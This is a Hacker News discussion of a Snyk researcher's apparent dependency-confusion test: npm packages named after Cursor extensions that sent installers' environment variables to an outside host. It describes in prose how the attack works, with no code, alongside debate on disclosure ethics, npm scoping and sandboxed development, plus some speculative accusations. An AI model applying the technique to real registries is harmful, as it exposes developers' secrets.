Skip to content(if available)orjump to list(if available)

Snyk security researcher deploys malicious NPM packages targeting cursor.com

n2d4

[EDIT: See the response by a Cursor dev below — looks like it was not authorized by them]

Sounds to me like Cursor internally has a private NPM registry with those packages. Because of how NPM works, it's quite easy to trick it to fetch the packages from the public registry instead, which could be used by an attacker [0].

Assumably, this Snyk employee either found or suspected that some part of Cursor's build is misconfigured as above, and uploaded those packages as a POC. (Given the package description "for Cursor", I'd think they were hired for this purpose.)

If that's the case, then there's not much to see here. The security researcher couldn't have used a private NPM registry to perform the POC if the point is to demonstrate a misconfiguration which skips the private registry.

.

[0] In particular, many proxies will choose the public over the private registry if the latest package version is higher: https://snyk.io/blog/detect-prevent-dependency-confusion-att...

ArVID220u

cursor dev here. reasonable assumptions, but not quite the case. the snyk packages are just the names of our bundled extensions, which we never package nor upload to any registry. (we do it just like how VS Code does it: https://github.com/microsoft/vscode/tree/main/extensions)

we did not hire snyk, but we reached out to them after seeing this and they apologized. we did not get any confirmation of what exactly they were trying to do here (but i think your explanation that someone there suspected a dependency confusion vulnerability is plausible. though it's pretty irresponsible imo to do that on public npm and actually sending up the env variables)

nomilk

> "pretty irresponsible"

Wouldn't it be more like "pretty illegal"? They could have simply used body: JSON.stringify("worked"), i.e. not sent target machines’ actual environment variables, including keys.

reubenmorais

It's an unfortunate incentive structure. If you're doing offensive security research, there's two ways you can go about it: you can report the potential vulnerability without exploiting it, in which case you risk the company coming back to you and saying "thanks but we don't consider this a vulnerability because it's only exploited through misconfiguration and we're too smart for that". Maybe you get some token reward of $50.

Or you can exploit it and say here's the PoC, this many people at your company fell for it, and this is some of the valuable data I got, including some tokens you'll have to rotate. This puts you into actual bug bounty territory. Certainly the PR side of things alone will incentivize them to pay you so you don't make too much of a noise about how Cursor leaked a bunch of credentials due to a misconfiguration that surely every good programmer knows about and defends against (like so many vulnerabilities seem so dumb in hindsight).

null

[deleted]

null

[deleted]

DigitalNoumena

It may interest you that Guy Podjarny, one of the Snyk founders, now has an AI coding company (https://www.tessl.io/about) that looks like a competitor of yours

IAmGraydon

[flagged]

not_a_bot_4sho

It was a thing back in the late 90s. I still do it in casual conversations with friends, less so in professional settings.

It's a gen X thing, like using "lol" to mean literal laughter

johnny22

it's been a thing at least on irc for at least 20 years. i've been used to it for a long time.

dovin

I like to call it informal case.

furyofantares

When I grew up online in the 90s, on IRC, AOL/AIM, ICQ and web forums, it was extremely common. Most of the people I know from then still do it, and I still do it with them and in many other places, although for whatever reason I don't do it here. Although it's 50/50 when on their phones now that phones auto-capitalize by default now.

urig

Rules are put in place to be followed, for a reason. Capital letters at the start of the sentence increase readability. People who don't bother with them are being incosiderate towards their readers.

pizza

yes but there could be many possible reasons, for instance

- it's muuch faster on mobile

- you're aiming to convey litheness to potential target audiences who will know to recognize it as intentional litheness

- you've gotten used to minimizing the amount of keystrokes necessary for communicating things, to the point it's second nature

- you've worked a lot in the past with older nlp systems, where ignoring capitalization was a given for inputs anyhow, and just got used to treating it as syntactic cruft only strictly necessary in more formal settings ;)

Piisamirotta

I have been thinking of this too. I find it super annoying to read and it looks unprofessional.

demarq

how does this bother you, what greater meaning does it have?

syndicatedjelly

[flagged]

benatkin

Yeah, I strongly disagree with the way it's characterized here.

arkadiyt

> If that's the case, then there's not much to see here

They could have demonstrated the POC without sending data about the installing host, including all your environment variables, upstream. That seems like crossing the line

nomilk

> If that's the case, then there's not much to see here.

Allowing someone full access to the contents of your environment (i.e. output of env command) is a big deal to most, I suspect.

LtWorf

If /proc is mounted you can read all of that.

rdegges

Hey there! I run DevRel & SecRel @ Snyk, we just published a piece to help dispel all the rumors, etc. This provides a lot of in-depth info on the situation: https://snyk.io/blog/snyk-security-labs-testing-update-curso...

BeefWellington

This response doesn't make a lot of sense.

What's the justification for taking all of the environment variables? This post tries to paper over that particular problem. If your goal was to see if you could attack the dependency chain the first steps of user+hostname would have been sufficient to prove your case.

Taking the environment variables is about taking the secrets, and kind of moves this from PoC to opposition supply chain attack. Not to mention it's not only Cursor devs that would be affected by this, it could have (if your plan worked) attacked anyone using the extensions.

It's also a tough buy given the note about the Snyk cofounder moving to compete directly with Cursor (courtesy @tankster): https://techcrunch.com/2024/11/14/tessl-raises-125m-at-at-50...

Assuming truly innocent motivations, you guys still need to give your heads a shake and rethink your approaches here.

bangaladore

Frankly I wouldn't be surprised if this was a case of Hanlon's razor. Some "researcher" thought well ENV vars will certainly show us what we want and that's where the conversation ended without thinking a little harder into what else might be in the vars.

neonerosion

The few details given in this response don't match up with what happened.

Who did the GDPR review before extracting env vars from systems that were not under your control? How did actively extracting potentially private data from the environment not get flagged as Unauthorized Access?

If this "experiment" (which happened to be against a competitor, mind) was reviewed and approved internally, that is a great demonstration of Snyk's approach to (ir)responsible data collection and disclosure.

NitpickLawyer

Wasn't this supposed to be fixed in NPM? I remember a talk by the researcher behind portswigger (sorry blanking on his name) doing this a while back, with great success (apple,ms,meta, basically all faang were vulnerable at that time).

tankster

Also interestingly the Snyk cofounder has started a competitor to cursor https://www.tessl.io/ https://techcrunch.com/2024/11/14/tessl-raises-125m-at-at-50...

I hope there is no foul play.

guappa

Given how all my interactions with them have been extremely negative (see my other comment), I think it's rather likely that there is foul play.

3eb7988a1663

I need to get serious about doing all development inside a virtual machine. One project per VM. There are just too many insidious ways in which I can ignorantly slip up such that I compromise my security. My only solace is that I am a nobody without secrets or a fortune to steal.

IDEs, plugins, development utilities, language libraries, OS packages, etc. So much code that I take on blind faith.

redserk

Vagrant’s popularity seems to have died down with Docker containers but it’s by far my favorite way to make dev environments.

Several years ago I worked somewhere that prohibited web browsers and development tools on laptops. If you needed to use a browser, you’d have to use one over Citrix. If you needed to code, you’d use a VDI or run the tools in a VM.

At the time I thought their approach was clinically insane, but I’m slowly starting to appreciate it.

arcanemachiner

I still like Vagrant. But I believe it's yet another victim of the Hashicorp license change debacle from a year or two ago.

Unlike with Terraform/OpenBao, I know of no community effort effort to keep the open-source version of this project alive. The latest open source version is still available on the Ubuntu repo, but who knows who long it will work until somefor of bit rot occurs.

pizza234

> I still like Vagrant. But I believe it's yet another victim of the Hashicorp license change debacle from a year or two ago.

The license change is irrelevant - from the licensing page:

> All non-production uses are permitted.

Devs who use Vagrant in a development environment can do it as they used to do it before.

> The latest open source version is still available on the Ubuntu repo, but who knows who long it will work until somefor of bit rot occurs.

Hashicorp products have always been intended to be downloaded from the website, since they're statically linked binaries (I don't like that they're huge, but matter of factually, they make distribution trivial).

fancyswimtime

more so a victim of speed

tacticus

This is the practice in many government sites these days.

Except the vm is some old windows version without any tools on it. no shell access.

can't actually do anything useful on there at all.

VDI systems could work if implemented properly. but that's the last thing a security team actually wants to do.

dacryn

VDI is actually preferred by our security teams, because they have complete deep packet inspection on literally all traffic going in and out.

On our laptops, there are still some flows that avoid the vpn etc..

pmontra

A customer of mine still uses vagrant on a project, for local development. That project started in 2016. We are developing on a mix of Linux, Mac, Windows and it's not as straightforward as it could be. Linux is easier, Windows is messier.

A newer project fires up VMs from a Python script that calls an adapter for EC2 (with the boto library) when run on AWs and for VirtualBox (by calling VBoxManage) when running locally. That allows us to simulate EC2 locally: it's a project that has to deal with many long jobs so we start VMs for them and terminate the VMs when the jobs are done. That also runs better on our mix of development systems. WSL2 helped to ease the pains of developing on Windows. We call the native Windows VirtualBox, not the one we could have installed inside WSL2, but we keep most of the code that runs on Linux.

hresvelgr

Devcontainers[1] are the new incarnation of this pattern. We use them at work and they are a dream for onboarding new developers. The only downside is the VSCode lock-in but if that's a concern there's always DevPod[2].

[1] https://containers.dev/

[2] https://devpod.sh/

bluehatbrit

It looks like the team behind it have been moving it towards more of an open standard over the last year. There's now a CLI reference implementation, and the Jetbrains IDE's have an implementation for it.

There's also a thread for Zed about a path to implementing it there [0]. Hopefully it'll become a bit more common over 2025.

[0] - https://github.com/zed-industries/zed/issues/11473

roland35

I think vs code is the easiest way to set up dev containers, but once they are created I mostly just shell into them and use neovim!

spike021

At my first job almost 10 years ago we had the concept of "X-in-a-box" using Vagrant + VMs and I miss that pattern so much ever since (multiple job skips later).

None of my jobs since have had any semblance of a better way to set up a local dev environment easily.

It was just way easier to encapsulate services or other things in a quickly reproducible state.

I digress..

jsjohnst

> At the time I thought their approach was clinically insane

Let’s be clear, it’s still clinically insane, even if marginally rationalized.

flyinghamster

I started using Ansible a few years back to set up VMs (or Raspberry Pis) with a consistent environment. Once I wrapped my head around it, I've found it very nice for any situation where I need to treat systems as livestock rather than pets.

bloopernova

I use Ansible in local only mode to install/configure macOS as a development environment.

Works well with Homebrew, and copies all the config files that devs often don't set up.

buildbot

Vagrant is still kicking! But yeah not as popular as back in 2014-2016?

A hybrid(?) alternative is enroot, which is pretty neat IMO, it converts a docker container into a squashfs file that can be mounted rw or used in an ephemeral way. https://github.com/NVIDIA/enroot

XorNot

The real problem is video performance in VMs. It still just...kind of sucks. Running Cinnamon in a VM is just about impossible to get GL acceleration working properly.

nvidia gates it's virtualized GPU offerings behind their enterprise cards, so we're left with ineffective command translation.

IMO: I can tolerate just about every other type of VM overhead, but choppy/unresponsive GUIs have a surprisingly bad ergonomic effect (and somehow leak into the performance of everything else).

If we could get that fixed, at least amongst Linux-on-Linux virtualization, I think virtualizing everything would be a much more tenable option.

alias_neo

There are ways around it. There is a community of people who use Nvidia enterprise cards with vGPU for gaming, performance is excellent, or PCI pass through an entire GPU.

If you can't do that because it's for company/corporate purposes then I can sympathise with not wanting to pay Nvidia's prices.

z3t4

You can get good security without virtualization, for example SeLinux and namespaces in Linux. Jails in BSD and zones in Solaris. We would have many viable and competing solutions if it wasn't for Microsoft monopoly.

danieldk

But would it matter much for development? Either SSH into the VM and use vi/emacs or use an IDE/editor with remote support. VS Code even lets you use a container as a development environment (I know, not a VM by default):

https://code.visualstudio.com/docs/devcontainers/containers

dsissitka

I don't know about VS Code's dev containers extension but the SSH extension's README says:

> Using Remote-SSH opens a connection between your local machine and the remote. Only use Remote-SSH to connect to secure remote machines that you trust and that are owned by a party whom you trust. A compromised remote could use the VS Code Remote connection to execute code on your local machine.

https://marketplace.visualstudio.com/items?itemName=ms-vscod...

If you're worried about extensions there's also:

> When a user installs an extension, VS Code automatically installs it to the correct location based on its kind. If an extension can run as either kind, VS Code will attempt to choose the optimal one for the situation;

https://code.visualstudio.com/api/advanced-topics/remote-ext...

whitehexagon

It's horrible that trust is being eroded so much, and seeing monthly GB updates to my OS doesnt reassure me at all. I like the idea of having a stable isolated VM for each project. Are there standard open-source tools to do this?

Specifically I'm transitioning my Go and Zig development environments from an old mac to an M1 with Asahi Linux and getting a bit lost even finding replacements for Truecrypt and Little Snitch. Do these VM tools support encrypted VM's with firewall rules? I saw Vagrant mentioned here and that sounds like it might cover the network isolation, but what else would you suggest?

pritambaral

I run all my dev environments under LXD. Even the IDE: full graphical Emacs (or Vim) over X11 forwarding over SSH. Host is Wayland, so security concerns with X are handled. WayPipe also works, but is jankier than X, probably because X, unlike Wayland, was designed for network transparency.

LXD, unlike Docker, doesn't play fast-and-loose with security. It runs rootless by default, and I don't allow non-root access to the LXD socket on host. Each container is a full userspace, so it's much more convenient to configure and use than Dockerfiles.

SSH from a container to a remote works transparently because I forward my SSH Agent. This is secure because my agent confirms each signing request with a GUI popup (on host).

3eb7988a1663

Can you point to a write-up somewhere that details this setup?

Part of the appeals of VMs is that they were built with security as a primary objective. I probably have to do something stupid to break that isolation. A custom ad hoc configuration makes me a bit nervous that I will unknowingly punch a Docker sized hole through my firewall and have less security than if I ran a stock workflow.

stevage

I always used to do that, using Vagrant. Mostly because it was the only practical way to maintain independent environments for the tools I was using.

These days I work in JavaScript and rarely have issues with project environments interfering with each other. I've gotten lazy and don't use VMs anymore.

In theory docker type setups could work but they just seem so much effort to learn and setup.

smatija

Seconding vagrant - especially because it's the only reasonable way I found so far to test linux release on my windows rig (would prefer to dev on linux, but windows-only company is windows-only company).

Basically I put a Vagrantfile in src folder, then run docker compose with db, caddy, app server and other services inside it - then I forward ports 80 and 443 from vm and use localhost.whateverdomain.igot with self-signed cert on caddy (since https is just enough different than http that I otherwise get bitten by bugs every so often).

When I start a new project I can usually just copy the Vagrantfile with minimal changes.

weinzierl

I know where you are coming from and I considered this myself again and again. For me and for now it is not something I want to do and not primarily because of the effort.

The VM might protect me, but it will not protect the users of the software I am producing. How can I ship a product to the customer and expect them to safely use it without protection when I myself only touch it when in a hazmat suit?

No, that is not the environment I want.

My current solution is to be super picky with my dependencies. More specifically I hold the opinion that we should neither trust projects nor companies but only people. This is not easy to do, but I do not see a better alternative as for now.

mjl-

i develop on linux, on various projects. i'm mostly concerned with all the tools, build scripts and tests that may read sensitive data, or accidentally destroy data. so i'm limiting access to files when working on a project with linux namespaces, using bubblewrap.

i've got a simple per-project dot file that describes the file system binds. while i'm working on a project, new terminals i open are automatically isolated to that project based on that dot file. it has very low (cognitive) overhead and integrates pretty much seamlessly. i suspect many developers have similar scripts. i looked for projects that did this some time ago, but couldn't find it. either because it's too simple to make a project about, or because i don't know how others would describe it. if anyone has pointers...

i don't limit network access (though i did experiment with logging all traffic, and automatically setting up a mitm proxy for all traffic; it wasn't convenient enough to use as regular user). there is still a whole kernel attack surface of course. though i'm mostly concerned about files being read/destroyed.

arkh

Time to main Qubes OS on your development machine. https://www.qubes-os.org/

3eb7988a1663

I actually did try to install Qubes over the holiday, but I repeatedly encountered installation failures and could not ever login to the system. Someone had posted an identical issue, but they were similarly stymied. I should revisit, but my initial foray tells me I am going to have to withstand quite a few papercuts in order to get the isolation I want.

sim7c00

never had issues with qubes like that but i did pick something tested (hw). u can check hardware compat list. it has also some good links to forums for specific hw related tweaks u might need. that being said, runing qubes fully and workin with it is something else... i decided i am uninteresting enough just to use ubuntu these days :p... maybe sometime ill have the patience again.

technion

I think a lot of the issues in this particular example is the ease with which api keys, once leaked, are single factor passwords.

If you ran a key logger on my machine you would never get into any major site with mfa. You couldn't watch me log on to the azure console with passkey and do much with it. But if you scrape a saved key with publish abilities bad things happen.

chrismarlow9

What's to stop me from installing custom certs and MITM your login session proxying the info. Or an extension to harvest the data after you login. I'm pretty sure if I have root it's game over one way or another. The surface is massive.

technion

At that point you've done something much more invasive and detectable than exporting a .env file and you've walked away with a very short lived token. There's always "something more an attacker can do", I'll stand by the view that requiring further authentication to perform interactive actions and pushes is worthwhile.

dacryn

I wonder how this is mitigated by my current workflow of running jupyter and vscode from a docker container.

I did not start doing this because of security, but just to get something more or less self managed without any possibility to break different projects. I am tired of my team spending too much time on extensions, versions, packages, ...

Docker compose files have saved our team many hours, even if it's extremely wasteful to have multiple vscode instances running alongside each other

gortok

The only part of the article I disagree with is this line:

> But in general, it’s a good idea not to install NPM packages blindly. If you know what to look for, there are definite signals that these packages are dodgy. All of these packages have just two files: package.json and index.js (or main.js). This is one of several flags that you can use to determine if a package is legit or not.

This works -- maybe OK for top-level packages. But for transitive dependencies it's nearly impossible to vet every transitive dependency.

If you're pulling in a package that has 400 dependencies, how the heck would you even competently check 10% of that surface area? https://gist.github.com/anvaka/8e8fa57c7ee1350e3491#top-1000...

ziddoap

>If you're pulling in a package that has 400 dependencies, how the heck would you even competently check 10% of that surface area?

This would be where different security advice would apply: don't pull in a package that has 400 dependencies.

krainboltgreene

Given the nature of software development and software developers, especially given American companies decide to value shareholder profits over programmer productivity, this might as well be effectively "You don't need to get vaccines, simply don't get sick from other people."

wyldberry

Things like this are suppose to be provenance of an organizations security engineering teams. Helping to ensure you don't ship something like this. It's also hard for them too because no one wants to force developers to re-implement already solved functionality.

nightpool

Out of curiosity, I've always meant to ask, are you related to the famous Geoguesser content creator in any way? It's a pretty distinctive last name.

XorNot

This is really where SELinux had the right idea overall: preclassifying files with data about their sensitivity, and denying access based on that, does adequately solve this problem (i.e. keeping npm installations away from id_rsa).

beardedwizard

The issue with SElinux is usability. A company called intrinsic tried a similar "allowlist" approach to javascript based on the assumption that you could never control this sprawl and had to assume every package was malicious. I never saw the technology take off because generating the allowlist was of course error prone.

im not sure what has to change in UX to make these approaches more palatable, but if you have to frequently allow 'good' behaviors, my experience is it never takes off.

__MatrixMan__

I think we need to to focus on empirical consensus rather than taking as authoritative some file which makes claims about what a particular piece of software will or won't do.

So before running any code you'd hash it and ask your peers: "what do we think this does?"

If it does something surprising, you roll back its effects (or maybe it was in a sandbox in the first place) and you update your peers so that next time they're not surprised.

I keep saying "you" but this would just be part of calling a function, handled by a tool and only surfaced to the user when they ask or when the surprising thing happens.

It could be a useful dataset both for maintainers and for people who want to better understand how to use the thing.

chamomeal

Wait how in the world does a React carousel component have over 400 deps…

tristor

Because Javascript is a drug that makes developers stupid.

It's almost trite at this point to comment on the obsession that Node has created with developers to reduce functionality to the smallest possible reusable parts, even trivial things, and publish them as packages, then to import and use those dependencies. The idea, in and of itself, is not terrible, but it's been taken to a logical extreme which is very much the definition of terrible.

jbreckmckye

Nearly all of these look like demo projects. You're making inferences about an entire group of developers based on a meme plus a search over the very 'worst' offenders.

jbreckmckye

Do you mean https://www.npmjs.com/package/carousel-react? By the looks of it, this was published by someone 7 years ago as part of a personal project. Nothing uses it.

Going through that list... they all look like personal projects, with no dependents, and a single release by a single person.

chamomeal

Ok now that I’ve actually looked at the package.json, it seems like this must be a joke or something. It’s got packages for CLI arg parsing, math expression evaluation, hashing, etc.

When I’m back on my computer I may look at the source and confirm my suspicion that none of those are required for the carousel functionality lol

cloverich

History of "micro dependencies" where many flexible utilities are split up into separate packages, such that many npm dependencies are a single function (ie rather than a package exporting ten methods, its ten separate dependencies).

Then because there is no standard library, many reinventions of similar but incompatible utilities. etc.

KuhlMensch

/giphy "first time?" meme

Sohcahtoa82

Did you think the meme about node_modules having more gravity than a star was just a meme?

It's very much based on reality. The npm ecosystem is just absolutely fucked.

loaph

> If you're pulling in a package that has 400 dependencies, how the heck would you even competently check 10% of that surface area?

At my place of work we use this great security too called Snyk. Definitely check it out

/s

guappa

snyk is the same company that instead of rotating oublic keys just… changes them without notice. https://github.com/snyk/cli/pull/5649

They also mark projects as "abandoned" if they move to any other forge that isn't github. And they stay abandoned even if new releases appear on npm/pypi :D

Their competence isn't as big as their fame, in my opinion.

Also one of their sales people insulted me over email, because apparently not being interested in buying their product means you're an incompetent developer who can only write software filled with vulnerabilities.

azemetre

They also penalize libraries that are "done," and require minimal development.

Completely backwards software that corpos only seem to buy because their insurers force them to check off some security list box.

gyoridavid

"insulted me over email" - whoa, that's wild, do you still have the email? would be fun to see it :D

guappa

Sorry, I searched, it seems all my emails from before the last company rename are gone.

edit: or microsoft outlook sucks… I tried to sort in reverse my inbox to see what's the oldest email there and "the request cannot be satisfied"

unixhero

Ouch, I kind of trusted it.

... more than Gmail and Google

ceejayoz

I get surprisingly many cold emails these days with a passive aggressive “shall we schedule a call, or are you a bad person who doesn’t give a shit about security?” approach.

matwood

Yeah. Or 'make this change to help our processes'. Um, that's not my job.

alp1n3_eth

That's extremely unfortunate, especially about the "abandoned" labelling. I've been looking to move off GitHub recently as well, it feels like it's got a bit too much control.

Codeberg looks interesting, and there are self-hosted ones like Forejo that also look great if you're okay with the maintenance.

guappa

I use codeberg :)

It has CI, pull requests, issues and whatnot. It also doesn't force you to use 2fa if you don't want :D

If you do corporate open source though, you're stuck on github because snyk, openssf, pypi and whatnot only interface with github.

For actual libre software codeberg is very good.

Keep in mind that debian salsa is open to everyone as well. The only annoyance is that non debian developers have a "-guest" suffix. But it's ok to use for projects that aren't debian specific.

bilekas

> hey also mark projects as "abandoned" if they move to any other forge that isn't github. And they stay abandoned even if new releases appear on npm/pypi :D

Well theres a sign of a good team.. /s

That's actually an interesting take, I haven't heard too much about them except that they do have an ego.

Ylpertnodi

I'm sure you can provide the body of the [appropriately redacted] said email?

guappa

I was also sure until I found out that outlook refuses to search old emails.

throw16180339

There's an additional hoop to jump through for Outlook to actually search your whole inbox. Here are the steps (https://answers.microsoft.com/en-us/outlook_com/forum/all/ou...)

woodruffw

Without more context, this doesn't look great for Snyk either way: either they have an employee using NPM to live test their own services, or they have insufficient controls/processes for performing a legitimate audit of Cursor without using public resources.

tru3_power

Why not? NPM behaves oddly when there is a public package named the same as one on a private repo, in some cases it’ll fetch the public one instead. I believe it’s called package squatting or something. They might have just been showing that this is possible during an assessment. No harm no foul here imo

woodruffw

> They might have just been showing that this is possible during an assessment. No harm no foul here imo

You're not supposed to leave public artifacts or test on public services during an assessment.

It's possible Cursor asked them to do so, but there's no public indication of this either. That's why I qualified my original comment. However, even if they did ask them to, it's typically not appropriate to use a separate unrelated public service (NPM) to perform the demo.

Source: I've done a handful of security assessments of public packaging indices.

guappa

Comments here seem to indicate that cursor did NOT ask them to (unless of course someone inside the company did and didn't tell the others)

compootr

if Cursor is secure it shouldn't be a problem for them! (and, according to their comments, it is)

BeefWellington

"No Harm No Foul" in this case would be a simple demonstrative failure case, not functioning malware.

nikcub

Looks like a white hat audit from Snyk testing. Got flagged because oastify.com is a default Burp Collaborator server.

They should be running a private npm repo for tests (not difficult to override locally) and also their own collaborator server.

Cthulhu_

It's not white hat because they actively extract data; if it was just to prove it worked they could've done a console.log, cause npm install to fail, or not extract a payload.

that_guy_iain

The data they extract is nothing sensitive and this way they can see how many hits they get. The more affected the bigger the headline for them.

__jonas

In what world is "all environment variables" nothing sensitive?

mirkodrummer

Looks like NPM is generating jobs for those in the security field. It’s an unfixable mess, I really hope some competition like JSR will put enough pressure on the organization.

devjab

It's not just NPM, it's the trust in third party libraries in general. Even though it's much rarer, you'll see exploits on platforms like Nuget. You're also going to see them on JSR. You have more security because they are immutable, but you're not protected from downloading a malicious pacakge before it's outed.

I think what we're more likely to see is that leglislation like DORA and NSIS increasinly require that you audit third party packages. This enforcing a different way of doing development in critical industries. I also think you're going to see a lot less usage of external packages in the age of LLM's. Because why would you pull an external package to generate something like your OpenAPI specification when any LLM can write a cli script that does it for you in an hour or two of configuring it to your needs? Similarily, you don't need to use LLM's directly to auto-generate "boring" parts of your code, you can have them build cli tools which does it. That way you're not relying on outside factors, and while I can almost guarantee that these cli tools will be horrible cowboy code, their output will be what you refine the tools to make.

With languages like Go pushing everything you need in their standard packages, you're looking at a world where you can do a lot of things with nothing but the standard library very easily.

guappa

I think NPM makes it worse because it's common to have hundreds, or thousands of dependencies. Which makes it easier to hide a malicious one in there.

rettichschnidi

OT: Has anyone ever gotten (proper) SBOMs for Snyks own tools and services? Asking because they want to sell my employee their solution (which does SBOMs).

KennyBlanken

Snyk is founded by people from the Israeli Army's Unit 8200.

I wouldn't install it if you paid me to, because it feels a lot like Unit 8200 pumps out entrepreneurs and funds them so that (like the NSA) they have their foot already in the door.

alpb

Wiz.io (who almost sold to Google for $25bn) also had founders from IDF Unit 8200. Dozens of other companies like Waze, Palo Alto Networks were also the same.

null

[deleted]

woodruffw

Conspiracies and politics aside, the reasons for the prominence of 8200 are somewhat boring: it's the largest unit in the IDF, in a relatively small country. Teenagers who demonstrate just about any degree of technical savviness get funneled into it for their mandatory service.

It's the equivalent of observing that SFBA startups tend to have a lot of Stanford grads at the helm.

(I don't have any particular love for Snyk as a product suite. I think most supply chain security products are severely over-hyped.)

ignoramous

> Conspiracies

Not when the dissidents put their name to paper.

  We, veterans of Unit 8200, reserve soldiers both past and present, declare that we refuse to take part in actions against Palestinians and refuse to continue serving as tools in deepening the military control over the Occupied Territories.

  It is commonly thought that the service in military intelligence is free of moral dilemmas and solely contributes to the reduction of violence and harm to innocent people. However, our military service has taught us that intelligence is an integral part of Israel's military occupation over the territories.

  The Palestinian population under military rule is completely exposed to espionage and surveillance by Israeli intelligence. While there are severe limitations on the surveillance of Israeli citizens, the Palestinians are not afforded this protection.

  There's no distinction between Palestinians who are, and are not, involved in violence. Information that is collected and stored harms innocent people. It is used for political persecution and to create divisions within Palestinian society by recruiting collaborators and driving parts of Palestinian society against itself. In many cases, intelligence prevents defendants from receiving a fair trial in military courts, as the evidence against them is not revealed.

  Intelligence allows for the continued control over millions of people through thorough and intrusive supervision and invasion of most areas of life. This does not allow for people to lead normal lives, and fuels more violence further distancing us from the end of the conflict.
https://www.theguardian.com/world/2014/sep/12/israeli-intell... (and that's from 2014)

manquer

Talent or skills is essential but alone is not enough. while the size and quality of the talent pool helps it is not sufficient to explain the success rate, considering that there are similar or better quality talent pools which are larger in many countries around the world, but they don't have the success rates Israeli startups and 8200 ones specifically have compared to their home market and talent pool size.

It is not some conspiracy either, success as founder has strong network effects and positive feedback loops, right mentorship, access to talent pool, or access to funding and people who can open doors all becomes easier when your network already has some success. Similar reason second time founders have it easier they can tap into their personal version of a network.

It is not unusual to Israel/8200, the valley itself benefits from this effect heavily after all.

sgammon

Incredibuild is on this list (at least with regard to current leadership)

de130W

Got better results with Syft

davedx

Lots of false positives IME

Sohcahtoa82

That wasn't my experience when I used Snyk at my last job, depending on your definition of FP.

For example, if you're using a multi-protocol networking library, and it says that the version you have installed is has a vulnerability in its SMTP handling, but you don't use the SMTP functionality, is that a FP?

I'd argue that it's irrelevant, but not a false positive.

I never had it get the version of a library wrong.

dannyallan

Snyk Research Labs regularly contributes back to the community with testing and research of common software packages. This particular research into Cursor was not intended to be malicious and included Snyk Research Labs and the contact information of the researcher. We were very specifically looking at dependency confusion in some VS Code extensions. The packages would not be installed directly by a developer.

Snyk does follow a responsible disclosure policy and while no one picked this package up, had anyone done so, we would have immediately followed up with them.

luma

Spraying your attack into the public with hopes of hitting your target is the polar opposite of responsible. The only "good" part of this is that you were caught in the act before anyone else got hit in the crossfire.

In response, you suggest that you'll send a letter of apology to the funeral home of anyone that got hit. Compromising their credentials, even if you have "good intentions", still puts them into a compromised position and they have to react the same as they would for any other malevolent attacker.

This is so close to "malicious" that it's hard to perceive a difference.

edit: Let's also remind everyone that a Snyk stakeholder is currently attempting to launch a Cursor competitor, so assuming good intentions is even MORE of a stretch.

senorrib

Cool. Why phone home the user's environment, then? The vulnerability could very much be confirmed by simply sending a stub instead of live envs.

yabones

This is grey-hat at best. Intent may have been good, but the fact is that this team created and distributed software to access and exfiltrate data without permission which is very illegal. You may want to consult with the legal department before posting about this on a public forum fyi.

etyp

Seems reasonable enough, but why would it (allegedly) send environment variables back via a POST? Even if it's entirely in good faith, I'd rather some random package not have my `env` output..

austinkhale

Upvoting this since presumably you're actually the CTO at Snyk and people should see your official response, but wow this feels wildly irresponsible. You could have proved the PoC without actually stealing innocent developer credentials. Furthermore, additional caution should have been taken given the conflict of interest with the competitor product to Cursor. Terrible decision making and terrible response.

pizzalife

What is responsible about sending the environment over in a proof of concept?

null

[deleted]

lopkeny12ko

Why, after all these years, are we still doing this stupid thing of using a global namespace for packages? If you are a company with an internal package registry just publish all your packages as @companyname/mylib and then no one can squat the name on a public registry. I thought we collectively learned this 4 years ago when dependency confusion attacks were first disclosed.

0xbadcafebee

The usual reasons: laziness, ignorance, poor design. Most package managers suck at letting you add 3rd party repos. Most package managers don't have namespaces of any kind. The ones that do have terrible design. Most of them lack a verification system or curation. Most of them have terrible search. None of them seem to have been exposed to hierarchical naming or package inheritance. And a very small number of people understand security in general, many fewer are educated about all the attack classes.

But all of that is why they get popular. Lazy, crappy, easy things are more popular than intentional, complex, harder things. Shitty popular tech wins.

gunnarmorling

In the Java world, you need to prove ownership of a given namespace (group id), e.g. via a TXT record for that domain. Isn't there a similar concept for NPM? The package is named sn4k-s3c/call-home, how will a victim be tricked into referencing that namespace sn4k-s3c (which I suppose is owned by the attacker, not Cursor)? I feel like I'm missing part of the picture here.

hennell

You're not really missing anything so much as adding a misguided assumption of competence to NPM.

Npm doesn't really do namespaces. There's just no ownership to prove as most packages are published like "call-home" with no namespace required. This gives exciting opportunities for you to register cal-home to trap users who miss type, or caII-home to innocuously add to your own or open source projects or whatever. Fun isn't it?

In this case the call home package is namespaced, but the real attack is the packages like "cursor-always-local" which has no namespace. Which can sometimes (?) take precedence over a private package with the same name.

It's not a pretty picture, you were better off missing it really.

Vaguely2178

> Npm doesn't really do namespaces.

Yes it really does. npm has namespaces (called scoped packages) and even explicitly encourages their use for private packages to avoid this sort of attack. From the npm docs: "A variant of this attack is when a public package is registered with the same name of a private package that an organization is using. We strongly encourage using scoped packages to ensure that a private package isn’t being substituted with one from the public registry." [1]

> This gives exciting opportunities for you to register cal-home to trap users who miss type, or caII-home to innocuously add to your own or open source projects or whatever. Fun isn't it?

npm actively blocks typo-squatting attacks during the publishing process: "Attackers may attempt to trick others into installing a malicious package by registering a package with a similar name to a popular package, in hopes that people will mistype or otherwise confuse the two. npm is able to detect typosquat attacks and block the publishing of these packages." [1]

This thread is full of people demonstrating the concept of confirmation bias.

[1] https://docs.npmjs.com/threats-and-mitigations

TheRealBrianF

You're referring to what I described previously here... ironically back when the first dependency confusion research was published: https://www.sonatype.com/blog/why-namespacing-matters-in-pub...

gunnarmorling

Thanks, Brian! Big kudos to you and Sonatype for the service you provide to the Java community.